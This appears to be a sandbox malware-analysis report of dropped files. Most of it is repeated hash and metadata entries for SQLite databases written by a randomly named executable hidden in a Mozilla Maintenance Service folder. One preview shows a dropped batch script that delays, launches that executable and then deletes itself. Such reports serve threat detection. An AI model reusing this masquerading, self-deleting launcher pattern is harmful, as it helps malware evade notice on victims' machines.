                                                                    SHA-512:CF9C75882404D09A6FA76842B5769F0953F976E41B8042656C2E467AA570B3D3F2ADEDBD2B46AB85D0FEA5FD0B3F6742773544A0CBD92A00CCE036CB305EDE97
                                                                    Malicious:false
                                                                    Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Program Files (x86)\mozilla maintenance service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\Uhg5bQrQMo.bat"
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.8439810553697228
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                    MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                    SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                    SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                    SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.6732424250451717
                                                                    Encrypted:false
                                                                    SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                    MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                    SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                    SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                    SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):40960
                                                                    Entropy (8bit):0.8553638852307782
                                                                    Encrypted:false
                                                                    SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                    MD5:28222628A3465C5F0D4B28F70F97F482
                                                                    SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                    SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                    SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5707520969659783
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                    SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                    SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                    SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):20480
                                                                    Entropy (8bit):0.5712781801655107
                                                                    Encrypted:false
                                                                    SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                    MD5:05A60B4620923FD5D53B9204391452AF
                                                                    SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                    SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                    SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                    SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                    SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                    Malicious:false
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                    Category:dropped
                                                                    Size (bytes):106496
                                                                    Entropy (8bit):1.136413900497188
                                                                    Encrypted:false
                                                                    SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                    MD5:429F49156428FD53EB06FC82088FD324
                                                                    SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                    SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                    SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                    Category:dropped
                                                                    Size (bytes):51200
                                                                    Entropy (8bit):0.8746135976761988
                                                                    Encrypted:false
                                                                    SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                    MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                    SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                    SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                    SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                    Malicious:false
                                                                    Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                    Category:dropped
                                                                    Size (bytes):196608
                                                                    Entropy (8bit):1.121297215059106
                                                                    Encrypted:false
                                                                    SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                    MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                    SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
